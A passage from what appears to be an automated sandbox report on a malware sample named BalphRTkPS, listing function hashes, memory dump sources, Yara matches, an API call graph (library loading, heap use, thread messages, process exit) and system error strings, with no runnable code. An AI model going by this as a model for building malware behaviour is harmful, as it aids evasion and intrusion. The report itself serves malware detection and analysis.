                                                                                                              • Opcode Fuzzy Hash: 9ca7fd2de4e06cf2e2d80f117c06dcb7cf6d57791ec5b9ccdb58150d193b500a
                                                                                                              • Instruction Fuzzy Hash: 24E11CB4E002598FDB14DFA9C980AAEFBB2FF89304F248569D414A7355D734AD42CFA0
                                                                                                              Function 0750B3A8 Relevance: .3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bdda244e669f38ee159031b28469ea29d8a0ec9aab98b09245f20772bb00eb90
                                                                                                              • Instruction ID: a5dcc794d3b23f34fd3eff52de59d2e81de58e890f2c874e6ceab440e0f0123a
                                                                                                              • Opcode Fuzzy Hash: bdda244e669f38ee159031b28469ea29d8a0ec9aab98b09245f20772bb00eb90
                                                                                                              • Instruction Fuzzy Hash: 6FE10CB4E002598FDB14DFA9D590AAEFBB2FF89304F248269D414A7355D7349D42CFA0
                                                                                                              Function 0750AF70 Relevance: .3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cb703873d0f2f3b92199fd9df6f25eaf25a3c6a6dec6439731dfb081875bafbf
                                                                                                              • Instruction ID: 01dc039603264bd642ec733e3c37caf687a7bebcef1c79bee196b5ae464d2246
                                                                                                              • Opcode Fuzzy Hash: cb703873d0f2f3b92199fd9df6f25eaf25a3c6a6dec6439731dfb081875bafbf
                                                                                                              • Instruction Fuzzy Hash: 2CE12DB4E002598FDB14DFA9D990AAEFBB2FF89300F248169D414A7355C7359D42CFA0
                                                                                                              Function 012AD584 Relevance: .3, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 27989b0686b1f700a1dac2e7e13141a54a6bcad0a291e8b51de34b37d67e4c00
                                                                                                              • Instruction ID: 14bd56a86485e675c321c0758790b2ba886195a5c09656c85a9a2ae229055bf1
                                                                                                              • Opcode Fuzzy Hash: 27989b0686b1f700a1dac2e7e13141a54a6bcad0a291e8b51de34b37d67e4c00
                                                                                                              • Instruction Fuzzy Hash: 15A18F36E1020A8FCF19DFB4C9405AEBBB2FF85300B55856AE901AF265DB75E946CF40
                                                                                                              Function 0750B39A Relevance: .1, Instructions: 136COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f92f545f99bf1bc624989be1d2b673aa32cc588e02a4b8f42688591e69a6572e
                                                                                                              • Instruction ID: d4405fc938cddc499d18a9cb031c11a691176c6b448269513dd9e769f32688d2
                                                                                                              • Opcode Fuzzy Hash: f92f545f99bf1bc624989be1d2b673aa32cc588e02a4b8f42688591e69a6572e
                                                                                                              • Instruction Fuzzy Hash: 4751FCB4E002598BDB14CFA9D9805AEFBB2FF89304F24816AD418AB355D7359D42CFA1
                                                                                                              Function 074EBD19 Relevance: .1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2337996899.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74e0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f4de70d8fb992edfcd264a2cc0264c72963ba69aa21f3b79b7b1b7b779655208
                                                                                                              • Instruction ID: e15a281da5da84e6aeff65752203718887a38b41578af9647729e73d0ec5ee79
                                                                                                              • Opcode Fuzzy Hash: f4de70d8fb992edfcd264a2cc0264c72963ba69aa21f3b79b7b1b7b779655208
                                                                                                              • Instruction Fuzzy Hash: C62127F26056559FCB069B28E8518E9BF75EFC2232705429BC140DF662DB31DC49C7D2

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.3%
                                                                                                              Dynamic/Decrypted Code Coverage:5.3%
                                                                                                              Signature Coverage:8.3%
                                                                                                              Total number of Nodes:132
                                                                                                              Total number of Limit Nodes:9
                                                                                                              execution_graph 87582 42c2c3 87583 42c2e0 87582->87583 87586 1772df0 LdrInitializeThunk 87583->87586 87584 42c308 87586->87584 87587 424fa3 87588 424fbf 87587->87588 87589 424fe7 87588->87589 87590 424ffb 87588->87590 87591 42ccb3 NtClose 87589->87591 87597 42ccb3 87590->87597 87593 424ff0 87591->87593 87594 425004 87600 42ee13 RtlAllocateHeap 87594->87600 87596 42500f 87598 42cccd 87597->87598 87599 42ccde NtClose 87598->87599 87599->87594 87600->87596 87698 425333 87702 42534c 87698->87702 87699 425394 87700 42ecf3 RtlFreeHeap 87699->87700 87701 4253a1 87700->87701 87702->87699 87703 4253d4 87702->87703 87705 4253d9 87702->87705 87704 42ecf3 RtlFreeHeap 87703->87704 87704->87705 87706 42fd93 87707 42fda3 87706->87707 87708 42fda9 87706->87708 87711 42edd3 87708->87711 87710 42fdcf 87714 42cfb3 87711->87714 87713 42edee 87713->87710 87715 42cfcd 87714->87715 87716 42cfde RtlAllocateHeap 87715->87716 87716->87713 87601 414063 87602 414082 87601->87602 87604 42cf23 87601->87604 87605 42cf40 87604->87605 87608 1772c70 LdrInitializeThunk 87605->87608 87606 42cf68 87606->87602 87608->87606 87717 4145d3 87718 4145ec 87717->87718 87723 417d83 87718->87723 87720 41460a 87721 414656 87720->87721 87722 414643 PostThreadMessageW 87720->87722 87722->87721 87724 417da7 87723->87724 87725 417de3 LdrLoadDll 87724->87725 87726 417dae 87724->87726 87725->87726 87726->87720 87727 41b893 87728 41b8d7 87727->87728 87729 41b8f8 87728->87729 87730 42ccb3 NtClose 87728->87730 87730->87729 87731 41ea93 87732 41eab9 87731->87732 87736 41ebad 87732->87736 87737 42fec3 87732->87737 87734 41eb4e 87735 42c313 LdrInitializeThunk 87734->87735 87734->87736 87735->87736 87738 42fe33 87737->87738 87739 42edd3 RtlAllocateHeap 87738->87739 87742 42fe90 87738->87742 87740 42fe6d 87739->87740 87741 42ecf3 RtlFreeHeap 87740->87741 87741->87742 87742->87734 87609 4019e4 87610 401a01 87609->87610 87613 430263 87610->87613 87616 42e8b3 87613->87616 87617 42e8d9 87616->87617 87628 407353 87617->87628 87619 42e8ef 87620 401a65 87619->87620 87631 41b6a3 87619->87631 87622 42e90e 87623 42e923 87622->87623 87646 42d053 87622->87646 87642 428853 87623->87642 87626 42e93d 87627 42d053 ExitProcess 87626->87627 87627->87620 87630 407360 87628->87630 87649 416a33 87628->87649 87630->87619 87632 41b6cf 87631->87632 87673 41b593 87632->87673 87635 41b714 87638 41b730 87635->87638 87640 42ccb3 NtClose 87635->87640 87636 41b6fc 87637 41b707 87636->87637 87639 42ccb3 NtClose 87636->87639 87637->87622 87638->87622 87639->87637 87641 41b726 87640->87641 87641->87622 87643 4288b5 87642->87643 87645 4288c2 87643->87645 87684 418bf3 87643->87684 87645->87626 87647 42d06d 87646->87647 87648 42d07e ExitProcess 87647->87648 87648->87623 87650 416a4d 87649->87650 87652 416a66 87650->87652 87653 42d6d3 87650->87653 87652->87630 87655 42d6ed 87653->87655 87654 42d71c 87654->87652 87655->87654 87660 42c313 87655->87660 87661 42c32d 87660->87661 87667 1772c0a 87661->87667 87662 42c359 87664 42ecf3 87662->87664 87670 42d003 87664->87670 87666 42d78c 87666->87652 87668 1772c11 87667->87668 87669 1772c1f LdrInitializeThunk 87667->87669 87668->87662 87669->87662 87671 42d01d 87670->87671 87672 42d02e RtlFreeHeap 87671->87672 87672->87666 87674 41b689 87673->87674 87675 41b5ad 87673->87675 87674->87635 87674->87636 87679 42c3b3 87675->87679 87678 42ccb3 NtClose 87678->87674 87680 42c3cd 87679->87680 87683 17735c0 LdrInitializeThunk 87680->87683 87681 41b67d 87681->87678 87683->87681 87686 418bf6 87684->87686 87685 41911b 87685->87645 87686->87685 87692 414243 87686->87692 87688 418d4a 87688->87685 87689 42ecf3 RtlFreeHeap 87688->87689 87690 418d62 87689->87690 87690->87685 87691 42d053 ExitProcess 87690->87691 87691->87685 87696 414263 87692->87696 87694 4142c2 87694->87688 87695 4142cc 87695->87688 87696->87695 87697 41b9b3 RtlFreeHeap LdrInitializeThunk 87696->87697 87697->87694 87743 419335 87744 42ccb3 NtClose 87743->87744 87745 41933f 87744->87745 87746 1772b60 LdrInitializeThunk

                                                                                                              Executed Functions

                                                                                                              Function 00417D83 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 253 417d83-417dac call 42f8d3 256 417db2-417dc0 call 42fed3 253->256 257 417dae-417db1 253->257 260 417dd0-417de1 call 42e383 256->260 261 417dc2-417dcd call 430173 256->261 266 417de3-417df7 LdrLoadDll 260->266 267 417dfa-417dfd 260->267 261->260 266->267
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                                                              • Instruction ID: 88b9ef28133dc456cab6c81c5f600716b01c30102915f9fd8f3ec612534eff34
                                                                                                              • Opcode Fuzzy Hash: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                                                              • Instruction Fuzzy Hash: 23011EB5E0020DABDF10DAE5DC42FEEB3789F54308F0081AAE90897241F635EB598B95
                                                                                                              Function 0042CCB3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 278 42ccb3-42ccec call 404623 call 42dea3 NtClose
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCE7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                                              • Instruction ID: d46bfabfc098e6d5a2aad821b6b2a61ea91c21e50ceafb7c4f345b9124cf626d
                                                                                                              • Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                                              • Instruction Fuzzy Hash: 98E026366006043BC210FA6ADC01FD7776CDFC5B10F000819FA0867242C7B4B90087F4
                                                                                                              Function 01772B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 396bfddb25253d986651ae32bafe6ac3a371b2c8b5c43506b0cb7fd7caf7247c
                                                                                                              • Instruction ID: 2c70833671dfb32b01ea2dfc702273ee7d3842cf8d6637c7090005d255ad0981
                                                                                                              • Opcode Fuzzy Hash: 396bfddb25253d986651ae32bafe6ac3a371b2c8b5c43506b0cb7fd7caf7247c
                                                                                                              • Instruction Fuzzy Hash: 3690026124640003420571584454616D00B97E0311B95C031E10145A4DC5258A916227
                                                                                                              Function 01772DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: b193527e9468e670cb44923f9c399192d5137fc3122ef71f52995c4493c84017
                                                                                                              • Instruction ID: 82cb42a798e53888c0339abc77963482317e4098285361a47779c40605a01015
                                                                                                              • Opcode Fuzzy Hash: b193527e9468e670cb44923f9c399192d5137fc3122ef71f52995c4493c84017
                                                                                                              • Instruction Fuzzy Hash: 0790023124540413D21171584544707900A97D0351FD5C422A042456CDD6568B52A223
                                                                                                              Function 01772C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 6b09422b77843be93d90fde2e7f2f21ffe16d89e165e36b12cbf1da45280f757
                                                                                                              • Instruction ID: fabb5ec443e4d2e96ba3d2c2f1dc189f7c6b497415f299f06ccb8b611d5b8580
                                                                                                              • Opcode Fuzzy Hash: 6b09422b77843be93d90fde2e7f2f21ffe16d89e165e36b12cbf1da45280f757
                                                                                                              • Instruction Fuzzy Hash: 7490023124548802D2107158844474A900697D0311F99C421A442466CDC6958A917223
                                                                                                              Function 017735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 02c26e0fe57a96309fd763ccf8a5b721ccce3e81825094e2a7cbf3bd91ed12ac
                                                                                                              • Instruction ID: 5a6a5f4da644db9e3a020c544c58c31cb8f4e9c20a8af636046f37b102092ec6
                                                                                                              • Opcode Fuzzy Hash: 02c26e0fe57a96309fd763ccf8a5b721ccce3e81825094e2a7cbf3bd91ed12ac
                                                                                                              • Instruction Fuzzy Hash: 8E90023164950402D20071584554706A00697D0311FA5C421A042457CDC7958B5166A3
                                                                                                              Function 004145A8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 4145a8-4145ae 1 4145b0-4145c4 0->1 2 414628-414641 0->2 3 414663-414668 2->3 4 414643-414654 PostThreadMessageW 2->4 4->3 5 414656-414660 4->5 5->3
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 04I_$086604I_P$086604I_P
                                                                                                              • API String ID: 1836367815-762223272
                                                                                                              • Opcode ID: 3cfd6ed29607252215f596f045744a4ea9eb262d71c1a3a603205bf06dbbed58
                                                                                                              • Instruction ID: 7364b2b1fcad01788479a4f9307d5c54d4abcef8cf499afca70ead5bc7e82b5e
                                                                                                              • Opcode Fuzzy Hash: 3cfd6ed29607252215f596f045744a4ea9eb262d71c1a3a603205bf06dbbed58
                                                                                                              • Instruction Fuzzy Hash: 59F02B32B0534C75D71186549C41FFEBB68DF82B18F0402DAE904AA140D679190687D5
                                                                                                              Function 004145C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 086604I_P$086604I_P
                                                                                                              • API String ID: 1836367815-368392577
                                                                                                              • Opcode ID: 9faca414eb337fa319e387a092d35be794f1d16e79f047f58bbeb488bc85edba
                                                                                                              • Instruction ID: 3b1c6bc8a4282993d6e4a2e48ae66367294b2a1ba01f1a571c31a1870c0ceae8
                                                                                                              • Opcode Fuzzy Hash: 9faca414eb337fa319e387a092d35be794f1d16e79f047f58bbeb488bc85edba
                                                                                                              • Instruction Fuzzy Hash: 25112972D8021C76E711A6919C42FDF7B7C8F81B58F404169FA047B2C0D6B85A0687E9
                                                                                                              Function 004145D3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 086604I_P$086604I_P
                                                                                                              • API String ID: 1836367815-368392577
                                                                                                              • Opcode ID: 2eede3f84bbbc3eef2b243bf2801b5c3105a0f127df9a857c8291aedbf75753a
                                                                                                              • Instruction ID: 0fb9ab954ef8db3f32d4c25afcf056a5d19c50fc272c64c350af8f6a8d246f1f
                                                                                                              • Opcode Fuzzy Hash: 2eede3f84bbbc3eef2b243bf2801b5c3105a0f127df9a857c8291aedbf75753a
                                                                                                              • Instruction Fuzzy Hash: CA01D671E4025876EB21A6919C42FDF7B7C9F81B58F014169FA047B2C0D6BC5A0687E9
                                                                                                              Function 00417E46 Relevance: 1.6, APIs: 1, Instructions: 90libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 231 417e46-417e49 232 417dd8-417de1 231->232 233 417e4b-417e52 231->233 234 417de3-417df7 LdrLoadDll 232->234 235 417dfa-417dfd 232->235 236 417e54-417e68 233->236 237 417e3a-417e3c 233->237 234->235 240 417e69-417e7a 236->240 238 417e3f-417e41 237->238 239 417e3e 237->239 241 417e01-417e02 238->241 242 417e43-417e44 238->242 239->238 244 417e7b-417e9b 240->244 244->244 245 417e9d-417e9f 244->245 246 417ea1 245->246 247 417eff-417f3e call 42f933 call 42bcb3 245->247 246->240 248 417ea3-417ea5 246->248 248->247
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                                                              • Instruction ID: 6fda3640aeabacdf2414ac2a0c0e5c28ef028ee1734c6d5c1d6e7c4e4c655ad8
                                                                                                              • Opcode Fuzzy Hash: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                                                              • Instruction Fuzzy Hash: 0021BE7554D3895ACB11DBA4CC80BDEBB74DF46328F0443DEE444CF282D664D94583D5
                                                                                                              Function 0042D003 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 273 42d003-42d044 call 404623 call 42dea3 RtlFreeHeap
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D08CFFD5,00000007,00000000,00000004,00000000,004175E7,000000F4), ref: 0042D03F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                                                              • Instruction ID: 480c2476483c24a98dc1ccd4d3f8387b92b9bc50a10ea559d801330f157754dd
                                                                                                              • Opcode Fuzzy Hash: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                                                              • Instruction Fuzzy Hash: CCE065B66046147FE710EFA9EC41E9B33ACEFC9710F00041AFA08A7241D778B9108AB9
                                                                                                              Function 0042CFB3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 268 42cfb3-42cff4 call 404623 call 42dea3 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,0041EB4E,?,?,00000000,?,0041EB4E,?,?,?), ref: 0042CFEF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                                              • Instruction ID: dc73a00d5b2d417b2c46dafea40d9adc71060332ee157e8bfc2b2fc429177c5c
                                                                                                              • Opcode Fuzzy Hash: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                                              • Instruction Fuzzy Hash: 2DE06DB66042047BD610EE59EC41E9B33ACDFC9710F000819F908A7241D675BA118BB9
                                                                                                              Function 0042D053 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 283 42d053-42d08c call 404623 call 42dea3 ExitProcess
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,B9F6A3FE,?,?,B9F6A3FE), ref: 0042D087
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0
                                                                                                              • Opcode ID: 15264c56b12c26b86eb90c2dabc34e6d55a96133bf5bcb6f2ee9bafa70ba7c0d
                                                                                                              • Instruction ID: 7a9833e9e4d947a3999cb396ff3879e5195884ea37e196f788b44d0b0899353c
                                                                                                              • Opcode Fuzzy Hash: 15264c56b12c26b86eb90c2dabc34e6d55a96133bf5bcb6f2ee9bafa70ba7c0d
                                                                                                              • Instruction Fuzzy Hash: D2E04F722406147BC210FA5ADC02F9B775CDBC5715F10845AFA086B241D7B9791587A8
                                                                                                              Function 01772C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 288 1772c0a-1772c0f 289 1772c11-1772c18 288->289 290 1772c1f-1772c26 LdrInitializeThunk 288->290
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 6575b6a84f96634bcab2904b3970ac6f48dc01f298106a71029f58955a9f8f03
                                                                                                              • Instruction ID: 7fe65e61980c790fdd4b1a34f6346f066874f608441069daf3ea2630a6eb2d2c
                                                                                                              • Opcode Fuzzy Hash: 6575b6a84f96634bcab2904b3970ac6f48dc01f298106a71029f58955a9f8f03
                                                                                                              • Instruction Fuzzy Hash: D3B04C719455C585DB11A7644608616B9056790711F55C461D2120655B47288191E276

                                                                                                              Non-executed Functions

                                                                                                              Function 017E8D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • *** enter .cxr %p for the context, xrefs: 017E8FBD
                                                                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 017E8F2D
                                                                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 017E8DC4
                                                                                                              • read from, xrefs: 017E8F5D, 017E8F62
                                                                                                              • *** then kb to get the faulting stack, xrefs: 017E8FCC
                                                                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 017E8DB5
                                                                                                              • The instruction at %p referenced memory at %p., xrefs: 017E8EE2
                                                                                                              • an invalid address, %p, xrefs: 017E8F7F
                                                                                                              • The critical section is owned by thread %p., xrefs: 017E8E69
